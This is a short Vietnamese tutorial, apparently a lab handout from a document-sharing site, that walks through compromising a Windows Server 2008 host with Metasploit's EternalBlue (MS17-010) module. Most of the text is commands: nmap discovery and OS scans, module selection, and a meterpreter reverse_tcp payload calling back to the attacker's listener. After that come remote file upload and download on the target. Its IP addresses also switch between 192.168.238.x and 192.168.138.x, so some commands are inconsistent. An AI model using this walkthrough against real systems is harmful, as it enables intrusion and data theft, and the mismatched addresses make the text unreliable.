TẤN CÔNG WINDOWS SERVER 2008 BĂNG METASPLOIT TRÊN KALI LINUX

You might also like

Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 2

TẤN CÔNG WINDOWS SERVER 2008 BĂNG METASPLOIT TRÊN KALI

LINUX
Bước 1: Xác định đối tượng cần tấn công:
- Xác định ip của kali linux bằng lệnh: sudo ifconfig
 IP của máy Kali Linux: 192.168.238.135
- Xác định địa chỉ IP của máy tính muốn tấn công. Lưu lý: máy tính muốn tấn công
phải chung lớp mạng với máy Kali Linux.
+ Ta gõ lênh: nmap -sP 192.168.238.1-255
Ta sẽ thu được các địa chỉ:
+ Địa chỉ default gateway
+ Địa chỉ broadcast .255
 Còn một các là của máy mục tiêu, một cái là của Kali.
 IP của máy mục tiêu là: 192.168.238.138
Bước 2: Xác định OS và PORT hiện có
- Với lệnh: nmap -sS 192.168.238.138 -O sẽ thu được OS và PORT hiện có.
+ Running: Microsoft Windows Server 2008 R2
+ Scan port là 445
Bước 3: Tìm module để sử dụng
- Khởi động Metasploit bằng lệnh: msfconsole
- Sử dụng lệnh search trong Metasploit để tìm một mô-đun phù hợp để sử dụng:
search eternalblue
- Thực hiện lệnh sau: use exploit/windows/smb/ms17_010_eternalblue
Bước 4: Chạy module
- Set RHOSTS ta thực hiện lệnh: set rhosts 192.168.138.138 (địa chỉ máy mục tiêu)
- Set LHOST ta thực hiện lệnh: set lhost 192.168.138.135 (địa chỉ ip máy tấn công)
- Set payload ta thực hiện lệnh: set payload windows/x64/meterpreter/reverse_tcp.
- Set lport ta thực hiện lệnh: set lport 4321
- Và cuối cùng ta thực hiện lệnh: exploit
Bước 5: Chúng ta có thể xác minh rằng chúng ta đã xâm nhập hệ thống bằng các lệnh
như sysinfo và getuid.
Sau khi tấn công thành công ta có thể thêm, sửa và xóa thư mục, đọc file của máy mục
tiêu. Ngoài ra, ta còn có thể upload file qua máy mục tiêu và download file từ máy mục
tiêu.
- Lệnh upload file: upload [nguồn] [đích]

You might also like